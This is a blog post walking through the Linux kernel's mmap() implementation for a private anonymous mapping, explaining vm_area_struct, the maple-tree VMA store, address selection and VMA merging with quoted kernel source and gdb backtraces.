 * This struct describes a virtual memory area. There is one of these
 * per VM-area/task. A VM area is any part of the process virtual memory
 * space that has a special rule for the page-fault handlers (ie a shared
 * library, the executable area etc).
 */
struct vm_area_struct {
	union {
		struct {
			/* VMA covers [vm_start; vm_end) addresses within mm */
			unsigned long vm_start;
			unsigned long vm_end;
		};
#ifdef CONFIG_PER_VMA_LOCK
		struct rcu_head vm_rcu;	/* Used for deferred freeing. */
#endif
	};

	struct mm_struct *vm_mm;	/* The address space we belong to. */
	pgprot_t vm_page_prot;          /* Access permissions of this VMA. */

	union {
		const vm_flags_t vm_flags;
		vm_flags_t __private __vm_flags;
	};

#ifdef CONFIG_PER_VMA_LOCK
	/* Flag to indicate areas detached from the mm->mm_mt tree */
	bool detached;

	int vm_lock_seq;
	struct vma_lock *vm_lock;
#endif

	/*
	 * For areas with an address space and backing store,
	 * linkage into the address_space->i_mmap interval tree.
	 *
	 */
	struct {
		struct rb_node rb;
		unsigned long rb_subtree_last;
	} shared;

	/*
	 * A file's MAP_PRIVATE vma can be in both i_mmap tree and anon_vma
	 * list, after a COW of one of the file pages.	A MAP_SHARED vma
	 * can only be in the i_mmap tree.  An anonymous MAP_PRIVATE, stack
	 * or brk vma (with NULL file) can only be in an anon_vma list.
	 */
	struct list_head anon_vma_chain; /* Serialized by mmap_lock &
					  * page_table_lock */
	struct anon_vma *anon_vma;	/* Serialized by page_table_lock */

	/* Function pointers to deal with this struct. */
	const struct vm_operations_struct *vm_ops;

	/* Information about our backing store: */
	unsigned long vm_pgoff;		/* Offset (within vm_file) in PAGE_SIZE
					   units */
	struct file * vm_file;		/* File we map to (can be NULL). */
	void * vm_private_data;		/* was vm_pte (shared mem) */

#ifdef CONFIG_ANON_VMA_NAME
	/*
	 * For private and shared anonymous mappings, a pointer to a null
	 * terminated string containing the name given to the vma, or NULL if
	 * unnamed. Serialized by mmap_lock. Use anon_vma_name to access.
	 */
	struct anon_vma_name *anon_name;
#endif
#ifdef CONFIG_SWAP
	atomic_long_t swap_readahead_info;
#endif
#ifndef CONFIG_MMU
	struct vm_region *vm_region;	/* NOMMU mapping region */
#endif
#ifdef CONFIG_NUMA
	struct mempolicy *vm_policy;	/* NUMA policy for the VMA */
#endif
#ifdef CONFIG_NUMA_BALANCING
	struct vma_numab_state *numab_state;	/* NUMA Balancing state */
#endif
	struct vm_userfaultfd_ctx vm_userfaultfd_ctx;
} __randomize_layout;

Perhaps understandably, there’s a lot going on here! But this is the structure, referred to as a vma, that describes the virtual memory areas of a process. For example, you can see at the top vm_start and vm_end define the star and end addresses of the vma; just below that vm_mm holds a reference to the mm the vma belongs etc.

We’ll touch more on each field as it becomes relevant, but I just wanted to introduce the structure here rather than trying to wedge it in when it crops up down the line.

`mm->mm_mt`

Okay, so a vma describes a single memory area, but as we saw, even our little program has quite a few memory areas - how are these all managed? Good question!

Each process is responsible for tracking its memory areas, and as we know, each process’s memory is managed by a [mm_struct](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm_types.h#L779)! So this is where we’ll find our answer:

struct mm_struct {
		// SNIP
		struct maple_tree mm_mt;

include/linux/mm_types.h

Previously, this would have been struct rb_root mm_rb;, but since 6.1 the kernel moved from red-black trees to the [maple_tree](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/maple_tree.h#L219) data structure for vma management.

I’m but a humble researcher, so if you’re interested in diving more into maple tree internals, this LWN article does a great job introducing maple trees (alternatively, head straight to the kernel docs). Suffice it to say it’s a cache-optimised, low memory footprint data structure ideal for storing non-overlapping ranges - perfect for vmas!

The key details to highlight are that:

mm_mt is the tree of vmas belonging to the mm_struct’s process,
A VMA is represented as a node within the tree, but the tree is also able to track gaps between these VMAs (i.e. gaps in the virtual address space)
The maple tree data structure comes with its own normal and advanced API, but there are also a set of wrapper functions specifically for handling vma maple tree usage

`do_mmap()`

/*
 * The caller must write-lock current->mm->mmap_lock.
 */
unsigned long do_mmap(struct file *file, unsigned long addr,
			unsigned long len, unsigned long prot,
			unsigned long flags, vm_flags_t vm_flags,
			unsigned long pgoff, unsigned long *populate,
			struct list_head *uf)
{

mm/mmap.c

Okay, let’s get back to it! For some context, upon entering [do_mmap()](https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L1255):

file is NULL as we’re mapping anonymous memory ([MAP_ANONYMOUS](https://elixir.bootlin.com/linux/v6.11.5/source/include/uapi/asm-generic/mman-common.h#L23)), i.e. we’re not mapping a file into our userspace process, but a chunk of “anonymous” physical memory.
vm_flags stores the flags used for the virtual memory mapping we’re creating. In this case, the caller [vm_mmap_pgoff()](https://elixir.bootlin.com/linux/v6.11.5/source/mm/util.c#L575) does not specify any flags.
populate is an unsigned long* initialised by do_mmap() and read by the caller, to determine if the mapping should be “populated” before returning to userspace. We’ll touch more on the significance of that later, just know that a mapping is populated when MAP_POPULATE is set and MAP_NONBLOCK is not (so not our case study).
uf, which relates to [userfaultfd(2)](https://man7.org/linux/man-pages/man2/userfaultfd.2.html), is a linked list initialised by the caller. It’s not touched in do_mmap() and probably out of scope for this series anyway, so we’ll ignore it for now.
addr, len, prot, flags, pgoff all correspond to the same values we passed into mmap(2) from our userspace program.

Okay, so what’s the goal of this function? We know from exploring the previous functions in the call stack that the return value is the value that mmap(2) returns to userspace: on success, the userspace address of the mapping; on error, the MAP_FAILED value ((void *) -1). So where does do_mmap(2)’s return value come from?

unsigned long do_mmap(struct file *file, unsigned long addr,
			unsigned long len, unsigned long prot,
			unsigned long flags, vm_flags_t vm_flags,
			unsigned long pgoff, unsigned long *populate,
			struct list_head *uf)
{
	// SNIP
	addr = mmap_region(file, addr, len, vm_flags, pgoff, uf);
	// SNIP
	return addr;
}

mm/mmap.c

Hm, so it looks like the rabbit hole goes deeper! do_mmap(2)’s job is to process and sanitise its arguments so that they can be passed to mmap_region(2) which sets up up the actual memory mapping (right??? surely there’s no more calls).

More specifically, do_mmap() has a few responsibilities, including:

Sanitising values and performing any necessary checks, such as preventing overflows or stopping the user exceeding the maximum mapping count defined by [sysctl_max_map_count](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm.h#L202).
Calculating the correct vm_flags, which are later applied to the struct vm_area_struct created for this mapping, based off of various factors such as prot, flags, mm->def_flags etc.
Determining what userspace virtual address, stored in addr, is passed to [mmap_region()](https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L2849).

Finding A Suitable `addr`

In order to find a suitable addr for our new memory mapping, broadly speaking, there’s two general cases for do_mmap() to consider:

Case A: flags includes MAP_FIXED | MAP_FIXED_NOREPLACE
Case B: flags doesn’t include MAP_FIXED | MAP_FIXED_NOREPLACE (our case)

For Case A, the fixed addr specified by the user is passed to mmap_region(). However, the virtual address range spanned by this new mapping (addr to addr + len) might overlap existing ones. The default behaviour is to unmap the overlapped part. If MAP_FIXED_NOREPLACE is set though, do_mmap() will return -EEXIST if the new mapping will end up overlapping any existing ones.

Otherwise, in case B, the kernel will determine the addr. The value of addr passed by the user is actually used as a hint about where to place the mapping. Note the “hint” addr is page aligned and rounded to a minimum value of mmap_min_addr[1] by [round_hint_to_min()](https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L1194) (which will happen in our case, as addr == 0).

In either case, [__get_unmapped_area()](https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L1923) is called to determine an appropriate addr:

	/* Obtain the address to map to. we verify (or select) it and ensure
	 * that it represents a valid section of the address space.
	 */
	addr = __get_unmapped_area(file, addr, len, pgoff, flags, vm_flags);
	if (IS_ERR_VALUE(addr))
		return addr;

mm/mmap.c

To avoid getting to lost in the sauce, we’ll skim over this function. Essentially it does some more sanitisation and checks. This includes another LSM hook (mmap_addr) on the addr yielded at the end of this function, as well as an arch specific check (arch_mmap_check()) which is currently only used by arm and sparc.

The approach used to get the unmapped area depends on a few factors:

If its a file, some file types may implement their own method to get an area.
If it’s a shared anonymous mapping, rather than directly allocating physical memory it actually uses a special shmem (shared memory) file (maybe we’ll touch on this later)
Finally, if neither case (i.e. MAP_PRIVATE | MAP_ANON), it will use either [thp_get_unmapped_area_vmflags()](https://elixir.bootlin.com/linux/v6.11.5/source/mm/huge_memory.c#L926) (if CONFIG_TRANSPARENT_HUGEPAGE=y) or [mm_get_unmapped_area_vmflags()](https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L1911) - this is the case we’re interested in!

Transparent Huge Pages (THPs) are a kernel feature for … you guessed it! Enabling huge pages, transparently! Currently for anonymous memory mappings and tmpfs/shmem.

If we recall our page primer, pages are typically defined as 4KB (0x1000 bytes) chunks of physical memory. A “huge page” here is 2M (0x200000 bytes) in size. So the tl;dr here is that thp_get_unmapped_area_vmflags() will try and align the addr to a 2M boundary so that it can be used as a huge page automatically (AKA transparently!). It’s okay if this doesn’t make total sense yet, as we’ll cover paging in more detail soon!

Either way it will end up using mm_get_unmapped_area_vmflags(), so that’s where we’ll go next! Well, briefly. Because this function will then call into an arch specific function depending on if the MMF_TOPDOWN bit is set in our processes’ mm->flags. This determines whether we’ll search from the top or bottom of our address space for an unmapped area.

On x86_64 this is set, which leads us to [arch_get_unmapped_area_topdown_vmflags()](https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/kernel/sys_x86_64.c#L161):

(gdb) bt
#0  arch_get_unmapped_area_topdown_vmflags (filp=0x0 , addr0=0, len=4096, pgoff=0, flags=34, vm_flags=115)
    at arch/x86/kernel/sys_x86_64.c:164
#1  0xffffffff81244143 in mm_get_unmapped_area_vmflags (mm=, filp=filp@entry=0x0 , addr=addr@entry=0, 
    len=len@entry=4096, pgoff=pgoff@entry=0, flags=flags@entry=34, vm_flags=115) at mm/mmap.c:1917
#2  0xffffffff81294a5d in thp_get_unmapped_area_vmflags (filp=0x0 , addr=0, len=4096, pgoff=0, flags=34, vm_flags=115)
    at mm/huge_memory.c:937
#3  thp_get_unmapped_area_vmflags (filp=0x0 , addr=0, len=len@entry=4096, pgoff=0, flags=34, vm_flags=115)
    at mm/huge_memory.c:926
#4  0xffffffff81244284 in __get_unmapped_area (file=file@entry=0x0 , addr=, len=len@entry=4096, 
    pgoff=, pgoff@entry=0, flags=flags@entry=34, vm_flags=vm_flags@entry=115) at mm/mmap.c:1957
#5  0xffffffff8124725d in do_mmap (file=file@entry=0x0 , addr=, addr@entry=0, len=len@entry=4096, 
    prot=prot@entry=3, flags=flags@entry=34, vm_flags=115, vm_flags@entry=0, pgoff=0, populate=0xffffc9000076bee8, uf=0xffffc9000076bef0)
    at mm/mmap.c:1325
#6  0xffffffff812160c7 in vm_mmap_pgoff (file=0x0 , addr=0, len=4096, prot=3, flag=34, pgoff=0) at mm/util.c:588
#7  0xffffffff81f8e8fe in do_syscall_x64 (regs=0xffffc9000076bf58, nr=) at arch/x86/entry/common.c:52
#8  do_syscall_64 (regs=0xffffc9000076bf58, nr=) at arch/x86/entry/common.c:83
#9  0xffffffff82000130 in entry_SYSCALL_64 () at arch/x86/entry/entry_64.S:121

We made it! Okay, let’s dig into how the address is fetched by walking through the function. There are various checks but for brevity I will focus on the addr finding:

unsigned long
arch_get_unmapped_area_topdown_vmflags(struct file *filp, unsigned long addr0,
			  unsigned long len, unsigned long pgoff,
			  unsigned long flags, vm_flags_t vm_flags)
{
	struct vm_area_struct *vma;
	struct mm_struct *mm = current->mm;
	unsigned long addr = addr0;
	struct vm_unmapped_area_info info = {};
    
	// SNIP
    
	if (flags & MAP_FIXED)
		return addr;

arch/x86/kernel/sys_x86_64.c

If MAP_FIXED is set, addr is returned as-is, no questions asked.

	if (addr) {
		addr &= PAGE_MASK;                              [0]
		if (!mmap_address_hint_valid(addr, len))        [1]
			goto get_unmapped_area;

		vma = find_vma(mm, addr);                       [2]
		if (!vma || addr + len <= vm_start_gap(vma))
			return addr;                            [3]
	}

arch/x86/kernel/sys_x86_64.c

If a hint is set (i.e. addr != 0) then the function will check if that address range is free. It does this by first making sure the addr is page aligned [0] and does another validation check on the addr [1]. The comment for [mmap_address_hint_valid()](https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/mm/mmap.c#L209) does a good job describing why this check is needed!

To check if the address range our new mapping will use is free, it calls [find_vma()](https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L2014) [2] - this function returns the first memory region at or AFTER addr in our mm. If no mapping is returned (!vma) then the address space after addr is free and we’re good to go.

However, if there is a mapping somewhere at or after addr, we need to make sure it starts AFTER the end of our new mapping. It does this by comparing where our new mapping will end (addr + len) and the start address of the vma ([vm_start_gap(vma)](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm.h#L3513); the gap part is because the function factors in any potential padding). If there’s no overlap, our mapping’s area is unmapped and we can use the hint! [3]

struct vm_unmapped_area_info {
	unsigned long flags;        // informs search behaviour
	unsigned long length;       // length of the mapping in bytes
	unsigned long low_limit;    // lowest vaddr to start at
	unsigned long high_limit;   // highest vaddr to end at
	unsigned long align_mask;   // alignment mask the addr must satisfy
	unsigned long align_offset; // 
	unsigned long start_gap;    // minimum gap required before mapping
};

include/linux/mm.h

If the hint isn’t valid or overlaps an existing mapping, the function will proceed to the get_unmapped_area label which will populate the [struct vm_unmapped_area_info](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm.h#L3443), which describes the properties and constraints of our new mapping.

Remember, as we’re searching topdown, high_limit defines the start point (base) for our search. So how is this calculated? By default, the function will use the value that is handily stored in mm->mmap_base (the base user vaddr for topdown allocations). But what is this?

From these slides by Adrian Huang

Let’s remind ourselves of the x86_64 process virtual address space. We can see that mm->mmap_base sits at the upper end of the address space, just below the stack (and its guard gap). This diagram is the “canonical” address space and assumes a typical 47-bits (out of the 64, on a 64-bit system) are used for the virtual address.

However, more bits may be used for the virtual address on some systems. So while the implementation defaults to mmap_base as the high_limit, if the hint is outside of this window, then the high_limit will instead be set to the true upper bounds of the user virtual address space (where TASK_SIZE_MAX defines the size virtual user address space).

	info.high_limit = get_mmap_base(0);
	// SNIP

	/*
	 * If hint address is above DEFAULT_MAP_WINDOW, look for unmapped area
	 * in the full address space.
	 *
	 * !in_32bit_syscall() check to avoid high addresses for x32
	 * (and make it no op on native i386).
	 */
	if (addr > DEFAULT_MAP_WINDOW && !in_32bit_syscall())
		info.high_limit += TASK_SIZE_MAX - DEFAULT_MAP_WINDOW;

arch/x86/kernel/sys_x86_64.c

The info structure is then passed to [vm_unmapped_area(&info)](https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L1765) which will do the search. As we specify VM_UNMAPPED_AREA_TOPDOWN in flags, it uses the [unmapped_area_topdown(info)](https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L1714) implementation.

Using the magic of gdb, we can set a breakpoint to examine the info structure for our program’s mapping to make sure everything aligns with our understanding:

(gdb) p/x *((struct vm_unmapped_area_info*)info)
$2 = {
  flags = VM_UNMAPPED_AREA_TOPDOWN, 
  length = 0x1000,                  // our mapping len
  low_limit = 0x1000,               // default low_limit
  high_limit = 0x7f4bc62a3000,      // mmap_base (highest bit set is 47)
  align_mask = 0x0, 
  align_offset = 0x0, 
  start_gap = 0x0
}

Now unmapped_area_topdown() has all the information it needs to search the address space from high_limit to low_limit, looking for a gap that fits our mapping of len (taking into account any alignment or gaps required before the mapping):

static unsigned long unmapped_area_topdown(struct vm_unmapped_area_info *info)
{
	// SNIP
	VMA_ITERATOR(vmi, current->mm, 0);
		
	// SNIP
    
	if (vma_iter_area_highest(&vmi, low_limit, high_limit, length))
		return -ENOMEM;

	gap = vma_iter_end(&vmi) - info->length;
	gap -= (gap - info->align_offset) & info->align_mask;
	gap_end = vma_iter_end(&vmi);

mm/mmap.c

Remember those maples trees we spoke about at the beginning? Well now it’s all going to come in handy! [VMA_ITERATOR()](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm_types.h#L1114) is a macro used to initialise an iterator, vmi, for iterating (!) the vmas of a process (our current->mm in this case).

The main logic is then handled by the handy [vma_iter_area_highest()](https://elixir.bootlin.com/linux/v6.11.5/source/mm/internal.h#L1411). This function wraps the advanced maple tree API, mas_empty_area_rev(), to find the first gap (i.e. a range not spanned by a node/vma) of length bytes, working from high_limit down to low_limit. And just like that we’ve done our topdown search!

There are then some additional checks to make sure it conforms with the supplied info plus some additional error cases but that’s the general gist of it. We did it! That’s how we find an unused virtual address for our mapping … at least for the default topdown case on an x86_64 system …

For context, this is where we are in the callstack at this point:

#0  0xffffffff81243e86 in unmapped_area_topdown (info=) at mm/mmap.c:1719
#1  vm_unmapped_area (info=info@entry=0xffffc900004b7d80) at mm/mmap.c:1770
#2  0xffffffff81037ce5 in arch_get_unmapped_area_topdown_vmflags (filp=0x0 , addr0=0, len=4096, pgoff=0, flags=34, 
    vm_flags=) at arch/x86/kernel/sys_x86_64.c:219
#3  0xffffffff81244143 in mm_get_unmapped_area_vmflags (mm=, filp=filp@entry=0x0 , addr=addr@entry=0, 
    len=len@entry=4096, pgoff=pgoff@entry=0, flags=flags@entry=34, vm_flags=115) at mm/mmap.c:1917
#4  0xffffffff81294a5d in thp_get_unmapped_area_vmflags (filp=0x0 , addr=0, len=4096, pgoff=0, flags=34, vm_flags=115)
    at mm/huge_memory.c:937
#5  thp_get_unmapped_area_vmflags (filp=0x0 , addr=0, len=len@entry=4096, pgoff=0, flags=34, vm_flags=115)
    at mm/huge_memory.c:926
#6  0xffffffff81244284 in __get_unmapped_area (file=file@entry=0x0 , addr=, len=len@entry=4096, 
    pgoff=, pgoff@entry=0, flags=flags@entry=34, vm_flags=vm_flags@entry=115) at mm/mmap.c:1957
#7  0xffffffff8124725d in do_mmap (file=file@entry=0x0 , addr=, addr@entry=0, len=len@entry=4096, 
    prot=prot@entry=3, flags=flags@entry=34, vm_flags=115, vm_flags@entry=0, pgoff=0, populate=0xffffc900004b7ee8, uf=0xffffc900004b7ef0)
    at mm/mmap.c:1325
#8  0xffffffff812160c7 in vm_mmap_pgoff (file=0x0 , addr=0, len=4096, prot=3, flag=34, pgoff=0) at mm/util.c:588
#9  0xffffffff81f8e8fe in do_syscall_x64 (regs=0xffffc900004b7f58, nr=) at arch/x86/entry/common.c:52
#10 do_syscall_64 (regs=0xffffc900004b7f58, nr=) at arch/x86/entry/common.c:83

We’re going to head back up to do_mmap() and cover the final bit of logic for the mapping process: mmap_region().

`mmap_region()`

	addr = mmap_region(file, addr, len, vm_flags, pgoff, uf);

mm/mmap.c

Okay! Can you believe we’re still on the first system call of our “simple” program?! There’s not long left now though! We’re back in do_mmap() and the pieces are set:

file is NULL as we’re mapping anonymous memory, not a file, in our address space
addr, as we’ve just painstakingly discovered, now contains a suitable virtual address for our mapping
len is the length of our mapping in bytes
vm_flags has been populated in do_mmap() from a combination of the prot and flags we passed to mmap() as well as the mm->def_flags
pgoff is zero, right? hah, well … for anonymous MAP_PRIVATE mappings, do_mmap() will set pgoff = addr >> PAGE_SHIFT;. But pgoff is for file offsets, and we’re not mapping a file?! The tl;dr here is this acts as an identifier for anonymous vmas (I’m sure we’ll touch on this later).
uf, the userfault list stuff, is still untouched and probably still out of scope for the post

Now we’re ready to jump into mmap_region()! The goal of this function is to do the actual “mapping” part of mmap(), which essentially means making sure our mapping (len bytes at addr with vm_flags properties) is represented by a struct vm_area_struct and stored in the mm->mm_mt. Sounds simple enough, right?

Well … as you might expect, there are a lot of cases, edge cases and validation that needs to be done to do this correctly. For now we’ll continue to focus on those relating specifically to anonymous mappings and our case study.

unsigned long mmap_region(struct file *file, unsigned long addr,
		unsigned long len, vm_flags_t vm_flags, unsigned long pgoff,
		struct list_head *uf)
{
	struct mm_struct *mm = current->mm;
	struct vm_area_struct *vma = NULL;
	struct vm_area_struct *next, *prev, *merge;
// SNIP
	VMA_ITERATOR(vmi, mm, addr);

mm/mmap.c

Right off the bat we can see the VMA_ITERATOR() macro again, which will be doing a lot of heavy lifting in this function for navigating the mm->mm_t maple tree. Note that it’s initialised with our addr, so the iterator will be initialised with addr as its index.

	/* Check against address space limit. */
	if (!may_expand_vm(mm, vm_flags, len >> PAGE_SHIFT)) {
		unsigned long nr_pages;
		// SNIP     
	}

	/* Unmap any existing mapping in the area */
	error = do_vmi_munmap(&vmi, mm, addr, len, uf, false);
	// SNIP

mm/mmap.c

Next we do some housekeeping. First is a check to make sure “the calling process may expand its vm space by the passed number of pages” ( len >> PAGE_SHIFT is a quick way to convert len bytes to the page count equivalent). This involves checking against any resource limits.

Then, we hit a quirk of MAP_FIXED behaviour we touched one earlier. Notably, when looking for an unmapped area, by default we’ll get an addr that does not overlap any existing mappings for len bytes. However, if MAP_FIXED is passed, it will just use the addr passed by the user (as long as its valid), regardless of overlaps.

If it does overlap any existing mappings, these will get unmapped. This behaviour is implemented by do_vmi_munmap(), which uses the vma iterator to unmap any vmas whose start address lies in addr to addr + len. Note mappings can be “sealed”[2] and can’t be unmapped like this, causing the current mmap() to fail.

	next = vma_next(&vmi);
	prev = vma_prev(&vmi);

mm/mmap.c

Next, the iterator is used to fetch first vma from where the iterator starts (i.e. the next vma after addr) and the first vma prior to where the iterator stars (i.e. the first vma before addr). mmap_region() will then check the following cases:

Can we merge the new mapping with the next vma instead of creating a new vma?
Can we merge the new OR merged mapping with the prev vma?
Some mappings, denoted by VM_SPECIAL, can’t be merged.
If no merging is possible, allocate a new vma, initialise it and insert it into the mm->mm_mt

VMA Merging

	/* Attempt to expand an old mapping */
	/* Check next */
	if (next && next->vm_start == end && !vma_policy(next) &&
	    can_vma_merge_before(next, vm_flags, NULL, file, pgoff+pglen,
				 NULL_VM_UFFD_CTX, NULL)) {

mm/mmap.c

A few things need to be checked to determine if we can expand an existing vma, instead of allocating a new struct vm_area_struct for our new mapping.

Let’s look at the first case: can we merge the new mapping with the next vma? First, there needs to be a next mapping and it needs to be adjacent to where our new mapping would go (i.e. the end of our new mapping, is the start of next).

Then ![vma_policy(next)](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm_types.h#L765) makes sure next doesn’t have it’s own specific NUMA policy (memory stuff, stored in vma->vm_policy). Finally [can_vma_merge_before()](https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L813) carries out this remaining checks, which basically involves:

Checking if the vm_flags, file etc. are compatible. Also, if it has it’s own vma->vm_ops->close to be called when the vma is closed, it won’t be merged.
If next is an anonymous vma cloned from a parent process, it won’t be merged.

If these checks are passed, next will be expanded to include our new mapping. Either way, similar checks will then be made for prev. If those checks pass, either:

next didn’t merge, in which case we’ll expand prev to include the new mapping
next did merge, in which case prev will be expanded to include the new mapping AND next.

If these checks fail a vma will be allocated for our new mapping.

VMA Allocation

So, there’s no one for our mapping to merge with. In this case, a new vma will be allocated, initialised and insert into the mm->mm_mt tree:

	vma = vm_area_alloc(mm);                           [0]
	// SNIP

	vma_iter_config(&vmi, addr, end);                  [1]
	vma_set_range(vma, addr, end, pgoff);              [2]
	vm_flags_init(vma, vm_flags);                      [3]
	vma->vm_page_prot = vm_get_page_prot(vm_flags);    [4]

	if (file) {                                        [5]
		// SNIP
	} else if (vm_flags & VM_SHARED) {                 [6]
		// SNIP
	} else {                                           [7]
		vma_set_anonymous(vma);
	}

	if (map_deny_write_exec(vma, vma->vm_flags)) {     [8]
		error = -EACCES;
		goto close_and_free_vma;
	}

	/* Allow architectures to sanity-check the vm_flags */
	error = -EINVAL;
	if (!arch_validate_flags(vma->vm_flags))
		goto close_and_free_vma;

	error = -ENOMEM;
	if (vma_iter_prealloc(&vmi, vma))                  [9]
		goto close_and_free_vma;

	/* Lock the VMA since it is modified after insertion into VMA tree */
	vma_start_write(vma);                              [10]
	vma_iter_store(&vmi, vma);                         [11]
	mm->map_count++;                                   [12]

mm/mmap.c

Most of this is fairly straightforward: we allocate a new struct vm_area_struct [0], update the iterator [1], update the vma start/end/pgoff [2], its flags and protections [3][4].

Next, there’s some mapping type specific initialisation depending on if its a file-backed [5], shared anonymous [6] or private anonymous mapping [7]. In this case, [vma_set_anonymous()](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm.h#L909) simply sets vma->vm_ops = NULL. This field being NULL is what determines it as (private) anonymous vma (as seen by the equivalent [vma_is_anonymous()](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm.h#L914) check).

There is then a security check [8], [map_deny_write_exec()](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mman.h#L192), which will prevent the creation of mapping with write and execute permissions if the mm has the MMF_HAS_MDWE flag set (note a similar check is also done by selinux via the mmap_file hook).

Finally, our vma is ready to be inserted into the mm->mm_mt, this is done by first preallocating enough nodes for the insertion (store) [9].

Then, if CONFIG_PER_VMA_LOCK=y, the per-vma write lock will be taken [10], which acts as a r/w semaphore in practice. This is interesting, because you might notice there is no subsequent [vma_start_write()](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm.h#L740). That’s because all vma write locks are unlocked automatically when the mmap write lock is released, read more here.

Finally our new mapping is inserted into the mm->mm_mt tree via the iterator [11], using [vma_iter_store()](https://elixir.bootlin.com/linux/v6.11.5/source/mm/internal.h#L1437), and the processes’ total mapping count is updated [12].

Final Bits

	vm_stat_account(mm, vm_flags, len >> PAGE_SHIFT);
	// SNIP
    
	/*
	 * New (or expanded) vma always get soft dirty status.
	 * Otherwise user-space soft-dirty page tracker won't
	 * be able to distinguish situation when vma area unmapped,
	 * then new mapped in-place (which must be aimed as
	 * a completely new data area).
	 */
	vm_flags_set(vma, VM_SOFTDIRTY);

	vma_set_page_prot(vma);

	validate_mm(mm);
	return addr;

mm/mmap.c

There’s some bits we’ve skipped related to files or huge pages, but eventually we’ll get here to the end of the function (we’re almost there!!). So what’s left to do?

Some accounting of course! [vm_stat_account()](https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L3612) updates various mm stat fields tracking the types of mappings, including: mm->total_vm (total pages), mm->exec_vm, mm->stack_vm and mm->data_vm (private, writable, not stack).

Now, regardless of whether this is a new or expanded vma, the VM_SOFTDIRTY flag is set. Dirty is memory management speech for “this has been modified btw!”. Typically this is in the context of changes to a file in memory that aren’t written to disk yet. Here, if CONFIG_MEM_SOFT_DIRTY=y, is used this bit is set to indicate that that the vma has been modified (as I understand it, the “soft” part means it doesn’t require immediate action by the kernel, but will be checked when the next relevant action is taken). We’ll touch more on what these “actions” are in the next section when we cover paging.

[vma_set_page_prot()](https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L90) will update vma->vm_page_prot to reflect vma->vm_flags. Next is [validate_mm()](https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L322), which is a debugging function that validates the state of the memory mappings. This is only enabled on debug builds with CONFIG_DEBUG_VM_MAPLE_TREE=y.

And last, but not least, we return the addr of our new mapping, which will propagate back, if all is valid, to the return value of the userspace mmap() call.

#0  mmap_region (file=file@entry=0x0 , addr=addr@entry=140379443372032, len=len@entry=4096, vm_flags=vm_flags@entry=115, 
    pgoff=pgoff@entry=34272325042, uf=uf@entry=0xffffc900006bbef0) at mm/mmap.c:2852
#1  0xffffffff81247544 in do_mmap (file=file@entry=0x0 , addr=140379443372032, addr@entry=0, len=len@entry=4096, 
    prot=, prot@entry=3, flags=flags@entry=34, vm_flags=, vm_flags@entry=0, pgoff=, 
    populate=0xffffc900006bbee8, uf=0xffffc900006bbef0) at mm/mmap.c:1468
#2  0xffffffff812160c7 in vm_mmap_pgoff (file=0x0 , addr=0, len=4096, prot=3, flag=34, pgoff=0) at mm/util.c:588
#3  0xffffffff81f8e8fe in do_syscall_x64 (regs=0xffffc900006bbf58, nr=) at arch/x86/entry/common.c:52
#4  do_syscall_64 (regs=0xffffc900006bbf58, nr=) at arch/x86/entry/common.c:83
#5  0xffffffff82000130 in entry_SYSCALL_64 () at arch/x86/entry/entry_64.S:121

Not much happens when we return back to do_mmap(), other than deciding how many pages, if any, need to be populated, before returning to vm_mmap_pgoff(). This function will then drop the mmap write lock and do any relevant userfaultfd and population bits.

Although out of scope, populating a mapping essentially involves doing what we’re going to cover in the next section (writing to memory) now, instead of waiting to access it.

Then we’re pretty much back in userspace, with a shiny new (or merged) mapping!

Summary

It’s only been, uh, 6000 words or so but just like that we’ve covered this line of code:

addr = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);

We did a whistle-stop (?!) tour of the mmap() system call, focusing on how private, anonymous mappings are created and managed by the kernel.

We got some first hand experience of how the struct mm_struct helps manages a processes memory, including the mm->mm_mt tree which tracks the memory areas within the processes virtual address space, which are represented by struct vm_area_struct.

We also dived into some implementation details, covering some of the security mechanisms and checks, how unused addresses for new mappings are found and the different cases that need to be considered when mapping a new region.

If you’re curious why mmap_min_addr is a thing, this mitigation was added way back in 2009 for 2.X kernels. For context then, check out this post from 2009 on bypassing it. For a bonus, there was a semi recent P0 post about modern NULL ptr deref exploitation.
https://www.kernel.org/doc/html/next/userspace-api/mseal.html

Next Time

Wow, I may have got a bit lost in the sauce for this one (sorry)… Hopefully this is useful for someone. This time we covered the first portion of our simple program: mapping memory. Next time, we’ll move onto writing to memory. Buckle up, as that’ll involve a deep dive into how the kernel does all things (*specifically pertaining to our case study) paging, starting with page faults and going from there (wish me luck).

That said, I think my next post might be more exploitation focused, both for my own sanity after this 6000 word linternals dump and also as it’s been a while since I published some security stuff. Anyways, like I said, I’m hoping this post bordered more on the “in depth but verbose walkthrough of linux internals” and not “mad ramblings of someone who overcommitted to an ambitious series”.

As always feel free to @me (on X, Bluesky or less commonly used Mastodon) if you have any questions, suggestions or corrections :)

Linternals: Exploring The mm Subsystem via mmap [0x01]

sam4k — Mon, 16 Dec 2024 14:00:01 +0000

That’s right, you’re not hallucinating, Linternals is back! It’s been a while, I know, but after some travelling and moving to a new role, I’ve finally found some time to ramble.

